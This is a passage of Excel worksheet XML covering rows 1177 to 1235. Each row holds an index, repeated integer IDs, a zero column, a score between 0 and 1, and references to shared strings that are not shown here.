      </c>
    </row>
    <row r="1177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1177" s="1">
        <v>1175</v>
      </c>
      <c r="B1177">
        <v>3092</v>
      </c>
      <c r="C1177">
        <v>3092</v>
      </c>
      <c r="D1177">
        <v>0</v>
      </c>
      <c r="E1177">
        <v>0.9901999831199646</v>
      </c>
      <c r="F1177" t="s">
        <v>7</v>
      </c>
      <c r="G1177" t="s">
        <v>2326</v>
      </c>
      <c r="H1177" t="s">
        <v>2327</v>
      </c>
    </row>
    <row r="1178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1178" s="1">
        <v>1176</v>
      </c>
      <c r="B1178">
        <v>3093</v>
      </c>
      <c r="C1178">
        <v>3093</v>
      </c>
      <c r="D1178">
        <v>0</v>
      </c>
      <c r="E1178">
        <v>0.94569998979568481</v>
      </c>
      <c r="F1178" t="s">
        <v>7</v>
      </c>
      <c r="G1178" t="s">
        <v>2328</v>
      </c>
      <c r="H1178" t="s">
        <v>1298</v>
      </c>
    </row>
    <row r="1179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1179" s="1">
        <v>1177</v>
      </c>
      <c r="B1179">
        <v>3094</v>
      </c>
      <c r="C1179">
        <v>3094</v>
      </c>
      <c r="D1179">
        <v>0</v>
      </c>
      <c r="E1179">
        <v>0.81859999895095825</v>
      </c>
      <c r="F1179" t="s">
        <v>7</v>
      </c>
      <c r="G1179" t="s">
        <v>2329</v>
      </c>
      <c r="H1179" t="s">
        <v>2330</v>
      </c>
    </row>
    <row r="1180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1180" s="1">
        <v>1178</v>
      </c>
      <c r="B1180">
        <v>6550</v>
      </c>
      <c r="C1180">
        <v>6550</v>
      </c>
      <c r="D1180">
        <v>0</v>
      </c>
      <c r="E1180">
        <v>0.76920002698898315</v>
      </c>
      <c r="F1180" t="s">
        <v>7</v>
      </c>
      <c r="G1180" t="s">
        <v>2331</v>
      </c>
      <c r="H1180" t="s">
        <v>2332</v>
      </c>
    </row>
    <row r="1181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1181" s="1">
        <v>1179</v>
      </c>
      <c r="B1181">
        <v>3097</v>
      </c>
      <c r="C1181">
        <v>3097</v>
      </c>
      <c r="D1181">
        <v>0</v>
      </c>
      <c r="E1181">
        <v>0.98290002346038818</v>
      </c>
      <c r="F1181" t="s">
        <v>7</v>
      </c>
      <c r="G1181" t="s">
        <v>2333</v>
      </c>
      <c r="H1181" t="s">
        <v>2334</v>
      </c>
    </row>
    <row r="1182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1182" s="1">
        <v>1180</v>
      </c>
      <c r="B1182">
        <v>3098</v>
      </c>
      <c r="C1182">
        <v>3098</v>
      </c>
      <c r="D1182">
        <v>0</v>
      </c>
      <c r="E1182">
        <v>0.38379999995231628</v>
      </c>
      <c r="F1182" t="s">
        <v>7</v>
      </c>
      <c r="G1182" t="s">
        <v>2335</v>
      </c>
      <c r="H1182" t="s">
        <v>2336</v>
      </c>
    </row>
    <row r="1183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1183" s="1">
        <v>1181</v>
      </c>
      <c r="B1183">
        <v>3090</v>
      </c>
      <c r="C1183">
        <v>3090</v>
      </c>
      <c r="D1183">
        <v>0</v>
      </c>
      <c r="E1183">
        <v>0.89079999923706055</v>
      </c>
      <c r="F1183" t="s">
        <v>7</v>
      </c>
      <c r="G1183" t="s">
        <v>2337</v>
      </c>
      <c r="H1183" t="s">
        <v>2338</v>
      </c>
    </row>
    <row r="1184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1184" s="1">
        <v>1182</v>
      </c>
      <c r="B1184">
        <v>3100</v>
      </c>
      <c r="C1184">
        <v>3100</v>
      </c>
      <c r="D1184">
        <v>0</v>
      </c>
      <c r="E1184">
        <v>0.99659997224807739</v>
      </c>
      <c r="F1184" t="s">
        <v>7</v>
      </c>
      <c r="G1184" t="s">
        <v>2339</v>
      </c>
      <c r="H1184" t="s">
        <v>2340</v>
      </c>
    </row>
    <row r="1185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1185" s="1">
        <v>1183</v>
      </c>
      <c r="B1185">
        <v>3103</v>
      </c>
      <c r="C1185">
        <v>3103</v>
      </c>
      <c r="D1185">
        <v>0</v>
      </c>
      <c r="E1185">
        <v>0.95779997110366821</v>
      </c>
      <c r="F1185" t="s">
        <v>7</v>
      </c>
      <c r="G1185" t="s">
        <v>2341</v>
      </c>
      <c r="H1185" t="s">
        <v>2342</v>
      </c>
    </row>
    <row r="1186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1186" s="1">
        <v>1184</v>
      </c>
      <c r="B1186">
        <v>3104</v>
      </c>
      <c r="C1186">
        <v>3104</v>
      </c>
      <c r="D1186">
        <v>0</v>
      </c>
      <c r="E1186">
        <v>0.9440000057220459</v>
      </c>
      <c r="F1186" t="s">
        <v>7</v>
      </c>
      <c r="G1186" t="s">
        <v>2343</v>
      </c>
      <c r="H1186" t="s">
        <v>2344</v>
      </c>
    </row>
    <row r="1187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1187" s="1">
        <v>1185</v>
      </c>
      <c r="B1187">
        <v>3105</v>
      </c>
      <c r="C1187">
        <v>3105</v>
      </c>
      <c r="D1187">
        <v>0</v>
      </c>
      <c r="E1187">
        <v>0.98329997062683105</v>
      </c>
      <c r="F1187" t="s">
        <v>7</v>
      </c>
      <c r="G1187" t="s">
        <v>2345</v>
      </c>
      <c r="H1187" t="s">
        <v>2346</v>
      </c>
    </row>
    <row r="1188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1188" s="1">
        <v>1186</v>
      </c>
      <c r="B1188">
        <v>3106</v>
      </c>
      <c r="C1188">
        <v>3106</v>
      </c>
      <c r="D1188">
        <v>0</v>
      </c>
      <c r="E1188">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1188" t="s">
        <v>7</v>
      </c>
      <c r="G1188" t="s">
        <v>2347</v>
      </c>
      <c r="H1188" t="s">
        <v>2348</v>
      </c>
    </row>
    <row r="1189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1189" s="1">
        <v>1187</v>
      </c>
      <c r="B1189">
        <v>3107</v>
      </c>
      <c r="C1189">
        <v>3107</v>
      </c>
      <c r="D1189">
        <v>0</v>
      </c>
      <c r="E1189">
        <v>0.99639999866485596</v>
      </c>
      <c r="F1189" t="s">
        <v>7</v>
      </c>
      <c r="G1189" t="s">
        <v>2349</v>
      </c>
      <c r="H1189" t="s">
        <v>2350</v>
      </c>
    </row>
    <row r="1190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1190" s="1">
        <v>1188</v>
      </c>
      <c r="B1190">
        <v>3108</v>
      </c>
      <c r="C1190">
        <v>3108</v>
      </c>
      <c r="D1190">
        <v>0</v>
      </c>
      <c r="E1190">
        <v>0.92989999055862427</v>
      </c>
      <c r="F1190" t="s">
        <v>7</v>
      </c>
      <c r="G1190" t="s">
        <v>2351</v>
      </c>
      <c r="H1190" t="s">
        <v>2352</v>
      </c>
    </row>
    <row r="1191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1191" s="1">
        <v>1189</v>
      </c>
      <c r="B1191">
        <v>3109</v>
      </c>
      <c r="C1191">
        <v>3109</v>
      </c>
      <c r="D1191">
        <v>0</v>
      </c>
      <c r="E1191">
        <v>0.66509997844696045</v>
      </c>
      <c r="F1191" t="s">
        <v>7</v>
      </c>
      <c r="G1191" t="s">
        <v>2353</v>
      </c>
      <c r="H1191" t="s">
        <v>2354</v>
      </c>
    </row>
    <row r="1192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1192" s="1">
        <v>1190</v>
      </c>
      <c r="B1192">
        <v>3102</v>
      </c>
      <c r="C1192">
        <v>3102</v>
      </c>
      <c r="D1192">
        <v>0</v>
      </c>
      <c r="E1192">
        <v>0.81889998912811279</v>
      </c>
      <c r="F1192" t="s">
        <v>7</v>
      </c>
      <c r="G1192" t="s">
        <v>2355</v>
      </c>
      <c r="H1192" t="s">
        <v>2330</v>
      </c>
    </row>
    <row r="1193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1193" s="1">
        <v>1191</v>
      </c>
      <c r="B1193">
        <v>3089</v>
      </c>
      <c r="C1193">
        <v>3089</v>
      </c>
      <c r="D1193">
        <v>0</v>
      </c>
      <c r="E1193">
        <v>0.81150001287460327</v>
      </c>
      <c r="F1193" t="s">
        <v>7</v>
      </c>
      <c r="G1193" t="s">
        <v>2356</v>
      </c>
      <c r="H1193" t="s">
        <v>2357</v>
      </c>
    </row>
    <row r="1194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1194" s="1">
        <v>1192</v>
      </c>
      <c r="B1194">
        <v>3088</v>
      </c>
      <c r="C1194">
        <v>3088</v>
      </c>
      <c r="D1194">
        <v>0</v>
      </c>
      <c r="E1194">
        <v>0.99690002202987671</v>
      </c>
      <c r="F1194" t="s">
        <v>7</v>
      </c>
      <c r="G1194" t="s">
        <v>2358</v>
      </c>
      <c r="H1194" t="s">
        <v>2359</v>
      </c>
    </row>
    <row r="1195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1195" s="1">
        <v>1193</v>
      </c>
      <c r="B1195">
        <v>6551</v>
      </c>
      <c r="C1195">
        <v>6551</v>
      </c>
      <c r="D1195">
        <v>0</v>
      </c>
      <c r="E1195">
        <v>0.94539999961853027</v>
      </c>
      <c r="F1195" t="s">
        <v>7</v>
      </c>
      <c r="G1195" t="s">
        <v>2360</v>
      </c>
      <c r="H1195" t="s">
        <v>2361</v>
      </c>
    </row>
    <row r="1196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1196" s="1">
        <v>1194</v>
      </c>
      <c r="B1196">
        <v>6270</v>
      </c>
      <c r="C1196">
        <v>6270</v>
      </c>
      <c r="D1196">
        <v>0</v>
      </c>
      <c r="E1196">
        <v>0.45390000939369202</v>
      </c>
      <c r="F1196" t="s">
        <v>7</v>
      </c>
      <c r="G1196" t="s">
        <v>2362</v>
      </c>
      <c r="H1196" t="s">
        <v>2363</v>
      </c>
    </row>
    <row r="1197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1197" s="1">
        <v>1195</v>
      </c>
      <c r="B1197">
        <v>3916</v>
      </c>
      <c r="C1197">
        <v>3916</v>
      </c>
      <c r="D1197">
        <v>0</v>
      </c>
      <c r="E1197">
        <v>0.98229998350143433</v>
      </c>
      <c r="F1197" t="s">
        <v>7</v>
      </c>
      <c r="G1197" t="s">
        <v>2364</v>
      </c>
      <c r="H1197" t="s">
        <v>2365</v>
      </c>
    </row>
    <row r="1198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1198" s="1">
        <v>1196</v>
      </c>
      <c r="B1198">
        <v>6563</v>
      </c>
      <c r="C1198">
        <v>6563</v>
      </c>
      <c r="D1198">
        <v>0</v>
      </c>
      <c r="E1198">
        <v>0.86909997463226318</v>
      </c>
      <c r="F1198" t="s">
        <v>7</v>
      </c>
      <c r="G1198" t="s">
        <v>2366</v>
      </c>
      <c r="H1198" t="s">
        <v>2367</v>
      </c>
    </row>
    <row r="1199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1199" s="1">
        <v>1197</v>
      </c>
      <c r="B1199">
        <v>3915</v>
      </c>
      <c r="C1199">
        <v>3915</v>
      </c>
      <c r="D1199">
        <v>0</v>
      </c>
      <c r="E1199">
        <v>0.51419997215270996</v>
      </c>
      <c r="F1199" t="s">
        <v>7</v>
      </c>
      <c r="G1199" t="s">
        <v>2368</v>
      </c>
      <c r="H1199" t="s">
        <v>2369</v>
      </c>
    </row>
    <row r="1200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1200" s="1">
        <v>1198</v>
      </c>
      <c r="B1200">
        <v>6559</v>
      </c>
      <c r="C1200">
        <v>6559</v>
      </c>
      <c r="D1200">
        <v>0</v>
      </c>
      <c r="E1200">
        <v>0.58420002460479736</v>
      </c>
      <c r="F1200" t="s">
        <v>7</v>
      </c>
      <c r="G1200" t="s">
        <v>2370</v>
      </c>
      <c r="H1200" t="s">
        <v>2371</v>
      </c>
    </row>
    <row r="1201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1201" s="1">
        <v>1199</v>
      </c>
      <c r="B1201">
        <v>3071</v>
      </c>
      <c r="C1201">
        <v>3071</v>
      </c>
      <c r="D1201">
        <v>0</v>
      </c>
      <c r="E1201">
        <v>0.57690000534057617</v>
      </c>
      <c r="F1201" t="s">
        <v>7</v>
      </c>
      <c r="G1201" t="s">
        <v>2372</v>
      </c>
      <c r="H1201" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="1202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1202" s="1">
        <v>1200</v>
      </c>
      <c r="B1202">
        <v>3914</v>
      </c>
      <c r="C1202">
        <v>3914</v>
      </c>
      <c r="D1202">
        <v>0</v>
      </c>
      <c r="E1202">
        <v>0.7840999960899353</v>
      </c>
      <c r="F1202" t="s">
        <v>7</v>
      </c>
      <c r="G1202" t="s">
        <v>2373</v>
      </c>
      <c r="H1202" t="s">
        <v>2374</v>
      </c>
    </row>
    <row r="1203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1203" s="1">
        <v>1201</v>
      </c>
      <c r="B1203">
        <v>6556</v>
      </c>
      <c r="C1203">
        <v>6556</v>
      </c>
      <c r="D1203">
        <v>0</v>
      </c>
      <c r="E1203">
        <v>0.99940001964569092</v>
      </c>
      <c r="F1203" t="s">
        <v>7</v>
      </c>
      <c r="G1203" t="s">
        <v>2375</v>
      </c>
      <c r="H1203" t="s">
        <v>2376</v>
      </c>
    </row>
    <row r="1204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1204" s="1">
        <v>1202</v>
      </c>
      <c r="B1204">
        <v>3077</v>
      </c>
      <c r="C1204">
        <v>3077</v>
      </c>
      <c r="D1204">
        <v>0</v>
      </c>
      <c r="E1204">
        <v>0.35649999976158142</v>
      </c>
      <c r="F1204" t="s">
        <v>7</v>
      </c>
      <c r="G1204" t="s">
        <v>2377</v>
      </c>
      <c r="H1204" t="s">
        <v>2378</v>
      </c>
    </row>
    <row r="1205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1205" s="1">
        <v>1203</v>
      </c>
      <c r="B1205">
        <v>6555</v>
      </c>
      <c r="C1205">
        <v>6555</v>
      </c>
      <c r="D1205">
        <v>0</v>
      </c>
      <c r="E1205">
        <v>0.96060001850128174</v>
      </c>
      <c r="F1205" t="s">
        <v>7</v>
      </c>
      <c r="G1205" t="s">
        <v>2379</v>
      </c>
      <c r="H1205" t="s">
        <v>2380</v>
      </c>
    </row>
    <row r="1206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1206" s="1">
        <v>1204</v>
      </c>
      <c r="B1206">
        <v>3080</v>
      </c>
      <c r="C1206">
        <v>3080</v>
      </c>
      <c r="D1206">
        <v>0</v>
      </c>
      <c r="E1206">
        <v>0.47569999098777771</v>
      </c>
      <c r="F1206" t="s">
        <v>7</v>
      </c>
      <c r="G1206" t="s">
        <v>2381</v>
      </c>
      <c r="H1206" t="s">
        <v>2382</v>
      </c>
    </row>
    <row r="1207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1207" s="1">
        <v>1205</v>
      </c>
      <c r="B1207">
        <v>6553</v>
      </c>
      <c r="C1207">
        <v>6553</v>
      </c>
      <c r="D1207">
        <v>0</v>
      </c>
      <c r="E1207">
        <v>0.67170000076293945</v>
      </c>
      <c r="F1207" t="s">
        <v>7</v>
      </c>
      <c r="G1207" t="s">
        <v>2383</v>
      </c>
      <c r="H1207" t="s">
        <v>2384</v>
      </c>
    </row>
    <row r="1208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1208" s="1">
        <v>1206</v>
      </c>
      <c r="B1208">
        <v>3082</v>
      </c>
      <c r="C1208">
        <v>3082</v>
      </c>
      <c r="D1208">
        <v>0</v>
      </c>
      <c r="E1208">
        <v>0.59299999475479126</v>
      </c>
      <c r="F1208" t="s">
        <v>7</v>
      </c>
      <c r="G1208" t="s">
        <v>2385</v>
      </c>
      <c r="H1208" t="s">
        <v>2386</v>
      </c>
    </row>
    <row r="1209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1209" s="1">
        <v>1207</v>
      </c>
      <c r="B1209">
        <v>3083</v>
      </c>
      <c r="C1209">
        <v>3083</v>
      </c>
      <c r="D1209">
        <v>0</v>
      </c>
      <c r="E1209">
        <v>0.76399999856948853</v>
      </c>
      <c r="F1209" t="s">
        <v>7</v>
      </c>
      <c r="G1209" t="s">
        <v>2387</v>
      </c>
      <c r="H1209" t="s">
        <v>2388</v>
      </c>
    </row>
    <row r="1210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1210" s="1">
        <v>1208</v>
      </c>
      <c r="B1210">
        <v>3910</v>
      </c>
      <c r="C1210">
        <v>3910</v>
      </c>
      <c r="D1210">
        <v>0</v>
      </c>
      <c r="E1210">
        <v>0.99159997701644897</v>
      </c>
      <c r="F1210" t="s">
        <v>7</v>
      </c>
      <c r="G1210" t="s">
        <v>2389</v>
      </c>
      <c r="H1210" t="s">
        <v>2390</v>
      </c>
    </row>
    <row r="1211" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1211" s="1">
        <v>1209</v>
      </c>
      <c r="B1211">
        <v>3085</v>
      </c>
      <c r="C1211">
        <v>3085</v>
      </c>
      <c r="D1211">
        <v>0</v>
      </c>
      <c r="E1211">
        <v>0.45140001177787781</v>
      </c>
      <c r="F1211" t="s">
        <v>7</v>
      </c>
      <c r="G1211" t="s">
        <v>2391</v>
      </c>
      <c r="H1211" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="1212" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1212" s="1">
        <v>1210</v>
      </c>
      <c r="B1212">
        <v>3086</v>
      </c>
      <c r="C1212">
        <v>3086</v>
      </c>
      <c r="D1212">
        <v>0</v>
      </c>
      <c r="E1212">
        <v>0.99269998073577881</v>
      </c>
      <c r="F1212" t="s">
        <v>7</v>
      </c>
      <c r="G1212" t="s">
        <v>2392</v>
      </c>
      <c r="H1212" t="s">
        <v>2393</v>
      </c>
    </row>
    <row r="1213" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1213" s="1">
        <v>1211</v>
      </c>
      <c r="B1213">
        <v>2969</v>
      </c>
      <c r="C1213">
        <v>2969</v>
      </c>
      <c r="D1213">
        <v>0</v>
      </c>
      <c r="E1213">
        <v>0.82840001583099365</v>
      </c>
      <c r="F1213" t="s">
        <v>7</v>
      </c>
      <c r="G1213" t="s">
        <v>2394</v>
      </c>
      <c r="H1213" t="s">
        <v>2395</v>
      </c>
    </row>
    <row r="1214" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1214" s="1">
        <v>1212</v>
      </c>
      <c r="B1214">
        <v>2798</v>
      </c>
      <c r="C1214">
        <v>2798</v>
      </c>
      <c r="D1214">
        <v>0</v>
      </c>
      <c r="E1214">
        <v>0.47620001435279852</v>
      </c>
      <c r="F1214" t="s">
        <v>7</v>
      </c>
      <c r="G1214" t="s">
        <v>2396</v>
      </c>
      <c r="H1214" t="s">
        <v>2397</v>
      </c>
    </row>
    <row r="1215" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1215" s="1">
        <v>1213</v>
      </c>
      <c r="B1215">
        <v>3974</v>
      </c>
      <c r="C1215">
        <v>3974</v>
      </c>
      <c r="D1215">
        <v>0</v>
      </c>
      <c r="E1215">
        <v>0.76550000905990601</v>
      </c>
      <c r="F1215" t="s">
        <v>7</v>
      </c>
      <c r="G1215" t="s">
        <v>2398</v>
      </c>
      <c r="H1215" t="s">
        <v>2399</v>
      </c>
    </row>
    <row r="1216" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1216" s="1">
        <v>1214</v>
      </c>
      <c r="B1216">
        <v>6248</v>
      </c>
      <c r="C1216">
        <v>6248</v>
      </c>
      <c r="D1216">
        <v>0</v>
      </c>
      <c r="E1216">
        <v>0.98329997062683105</v>
      </c>
      <c r="F1216" t="s">
        <v>7</v>
      </c>
      <c r="G1216" t="s">
        <v>2400</v>
      </c>
      <c r="H1216" t="s">
        <v>2401</v>
      </c>
    </row>
    <row r="1217" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1217" s="1">
        <v>1215</v>
      </c>
      <c r="B1217">
        <v>2844</v>
      </c>
      <c r="C1217">
        <v>2844</v>
      </c>
      <c r="D1217">
        <v>0</v>
      </c>
      <c r="E1217">
        <v>0.53769999742507935</v>
      </c>
      <c r="F1217" t="s">
        <v>7</v>
      </c>
      <c r="G1217" t="s">
        <v>2402</v>
      </c>
      <c r="H1217" t="s">
        <v>2403</v>
      </c>
    </row>
    <row r="1218" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1218" s="1">
        <v>1216</v>
      </c>
      <c r="B1218">
        <v>2845</v>
      </c>
      <c r="C1218">
        <v>2845</v>
      </c>
      <c r="D1218">
        <v>0</v>
      </c>
      <c r="E1218">
        <v>0.53369998931884766</v>
      </c>
      <c r="F1218" t="s">
        <v>7</v>
      </c>
      <c r="G1218" t="s">
        <v>2404</v>
      </c>
      <c r="H1218" t="s">
        <v>2405</v>
      </c>
    </row>
    <row r="1219" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1219" s="1">
        <v>1217</v>
      </c>
      <c r="B1219">
        <v>6230</v>
      </c>
      <c r="C1219">
        <v>6230</v>
      </c>
      <c r="D1219">
        <v>0</v>
      </c>
      <c r="E1219">
        <v>0.60600000619888306</v>
      </c>
      <c r="F1219" t="s">
        <v>7</v>
      </c>
      <c r="G1219" t="s">
        <v>2406</v>
      </c>
      <c r="H1219" t="s">
        <v>2407</v>
      </c>
    </row>
    <row r="1220" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1220" s="1">
        <v>1218</v>
      </c>
      <c r="B1220">
        <v>2849</v>
      </c>
      <c r="C1220">
        <v>2849</v>
      </c>
      <c r="D1220">
        <v>0</v>
      </c>
      <c r="E1220">
        <v>0.71660000085830688</v>
      </c>
      <c r="F1220" t="s">
        <v>7</v>
      </c>
      <c r="G1220" t="s">
        <v>2408</v>
      </c>
      <c r="H1220" t="s">
        <v>2409</v>
      </c>
    </row>
    <row r="1221" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1221" s="1">
        <v>1219</v>
      </c>
      <c r="B1221">
        <v>2853</v>
      </c>
      <c r="C1221">
        <v>2853</v>
      </c>
      <c r="D1221">
        <v>0</v>
      </c>
      <c r="E1221">
        <v>0.7444000244140625</v>
      </c>
      <c r="F1221" t="s">
        <v>7</v>
      </c>
      <c r="G1221" t="s">
        <v>2410</v>
      </c>
      <c r="H1221" t="s">
        <v>2411</v>
      </c>
    </row>
    <row r="1222" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1222" s="1">
        <v>1220</v>
      </c>
      <c r="B1222">
        <v>2869</v>
      </c>
      <c r="C1222">
        <v>2869</v>
      </c>
      <c r="D1222">
        <v>0</v>
      </c>
      <c r="E1222">
        <v>0.99400001764297485</v>
      </c>
      <c r="F1222" t="s">
        <v>7</v>
      </c>
      <c r="G1222" t="s">
        <v>2412</v>
      </c>
      <c r="H1222" t="s">
        <v>2413</v>
      </c>
    </row>
    <row r="1223" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1223" s="1">
        <v>1221</v>
      </c>
      <c r="B1223">
        <v>6658</v>
      </c>
      <c r="C1223">
        <v>6658</v>
      </c>
      <c r="D1223">
        <v>0</v>
      </c>
      <c r="E1223">
        <v>0.99919998645782471</v>
      </c>
      <c r="F1223" t="s">
        <v>7</v>
      </c>
      <c r="G1223" t="s">
        <v>2414</v>
      </c>
      <c r="H1223" t="s">
        <v>2415</v>
      </c>
    </row>
    <row r="1224" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1224" s="1">
        <v>1222</v>
      </c>
      <c r="B1224">
        <v>2843</v>
      </c>
      <c r="C1224">
        <v>2843</v>
      </c>
      <c r="D1224">
        <v>0</v>
      </c>
      <c r="E1224">
        <v>0.54729998111724854</v>
      </c>
      <c r="F1224" t="s">
        <v>7</v>
      </c>
      <c r="G1224" t="s">
        <v>2416</v>
      </c>
      <c r="H1224" t="s">
        <v>2417</v>
      </c>
    </row>
    <row r="1225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1225" s="1">
        <v>1223</v>
      </c>
      <c r="B1225">
        <v>6656</v>
      </c>
      <c r="C1225">
        <v>6656</v>
      </c>
      <c r="D1225">
        <v>0</v>
      </c>
      <c r="E1225">
        <v>0.55390000343322754</v>
      </c>
      <c r="F1225" t="s">
        <v>7</v>
      </c>
      <c r="G1225" t="s">
        <v>2418</v>
      </c>
      <c r="H1225" t="s">
        <v>2419</v>
      </c>
    </row>
    <row r="1226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1226" s="1">
        <v>1224</v>
      </c>
      <c r="B1226">
        <v>2881</v>
      </c>
      <c r="C1226">
        <v>2881</v>
      </c>
      <c r="D1226">
        <v>0</v>
      </c>
      <c r="E1226">
        <v>0.76370000839233398</v>
      </c>
      <c r="F1226" t="s">
        <v>7</v>
      </c>
      <c r="G1226" t="s">
        <v>2420</v>
      </c>
      <c r="H1226" t="s">
        <v>2421</v>
      </c>
    </row>
    <row r="1227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1227" s="1">
        <v>1225</v>
      </c>
      <c r="B1227">
        <v>4020</v>
      </c>
      <c r="C1227">
        <v>4020</v>
      </c>
      <c r="D1227">
        <v>0</v>
      </c>
      <c r="E1227">
        <v>0.83039999008178711</v>
      </c>
      <c r="F1227" t="s">
        <v>7</v>
      </c>
      <c r="G1227" t="s">
        <v>2422</v>
      </c>
      <c r="H1227" t="s">
        <v>2423</v>
      </c>
    </row>
    <row r="1228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1228" s="1">
        <v>1226</v>
      </c>
      <c r="B1228">
        <v>2887</v>
      </c>
      <c r="C1228">
        <v>2887</v>
      </c>
      <c r="D1228">
        <v>0</v>
      </c>
      <c r="E1228">
        <v>0.81050002574920654</v>
      </c>
      <c r="F1228" t="s">
        <v>7</v>
      </c>
      <c r="G1228" t="s">
        <v>2424</v>
      </c>
      <c r="H1228" t="s">
        <v>2425</v>
      </c>
    </row>
    <row r="1229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1229" s="1">
        <v>1227</v>
      </c>
      <c r="B1229">
        <v>4016</v>
      </c>
      <c r="C1229">
        <v>4016</v>
      </c>
      <c r="D1229">
        <v>0</v>
      </c>
      <c r="E1229">
        <v>0.95109999179840088</v>
      </c>
      <c r="F1229" t="s">
        <v>7</v>
      </c>
      <c r="G1229" t="s">
        <v>2426</v>
      </c>
      <c r="H1229" t="s">
        <v>2427</v>
      </c>
    </row>
    <row r="1230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1230" s="1">
        <v>1228</v>
      </c>
      <c r="B1230">
        <v>2890</v>
      </c>
      <c r="C1230">
        <v>2890</v>
      </c>
      <c r="D1230">
        <v>0</v>
      </c>
      <c r="E1230">
        <v>0.79699999094009399</v>
      </c>
      <c r="F1230" t="s">
        <v>7</v>
      </c>
      <c r="G1230" t="s">
        <v>2428</v>
      </c>
      <c r="H1230" t="s">
        <v>2429</v>
      </c>
    </row>
    <row r="1231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1231" s="1">
        <v>1229</v>
      </c>
      <c r="B1231">
        <v>4014</v>
      </c>
      <c r="C1231">
        <v>4014</v>
      </c>
      <c r="D1231">
        <v>0</v>
      </c>
      <c r="E1231">
        <v>0.52910000085830688</v>
      </c>
      <c r="F1231" t="s">
        <v>7</v>
      </c>
      <c r="G1231" t="s">
        <v>2430</v>
      </c>
      <c r="H1231" t="s">
        <v>2431</v>
      </c>
    </row>
    <row r="1232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1232" s="1">
        <v>1230</v>
      </c>
      <c r="B1232">
        <v>2892</v>
      </c>
      <c r="C1232">
        <v>2892</v>
      </c>
      <c r="D1232">
        <v>0</v>
      </c>
      <c r="E1232">
        <v>0.51010000705718994</v>
      </c>
      <c r="F1232" t="s">
        <v>7</v>
      </c>
      <c r="G1232" t="s">
        <v>2432</v>
      </c>
      <c r="H1232" t="s">
        <v>2433</v>
      </c>
    </row>
    <row r="1233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1233" s="1">
        <v>1231</v>
      </c>
      <c r="B1233">
        <v>4021</v>
      </c>
      <c r="C1233">
        <v>4021</v>
      </c>
      <c r="D1233">
        <v>0</v>
      </c>
      <c r="E1233">
        <v>0.99720001220703125</v>
      </c>
      <c r="F1233" t="s">
        <v>7</v>
      </c>
      <c r="G1233" t="s">
        <v>2434</v>
      </c>
      <c r="H1233" t="s">
        <v>2435</v>
      </c>
    </row>
    <row r="1234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1234" s="1">
        <v>1232</v>
      </c>
      <c r="B1234">
        <v>2893</v>
      </c>
      <c r="C1234">
        <v>2893</v>
      </c>
      <c r="D1234">
        <v>0</v>
      </c>
      <c r="E1234">
        <v>0.50870001316070557</v>
      </c>
      <c r="F1234" t="s">
        <v>7</v>
      </c>
      <c r="G1234" t="s">
        <v>2436</v>
      </c>
      <c r="H1234" t="s">
        <v>2437</v>
      </c>
    </row>
    <row r="1235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1235" s="1">
        <v>1233</v>
      </c>
      <c r="B1235">
        <v>4042</v>
      </c>
      <c r="C1235">
        <v>4042</v>
      </c>
      <c r="D1235">
        <v>0</v>
      </c>
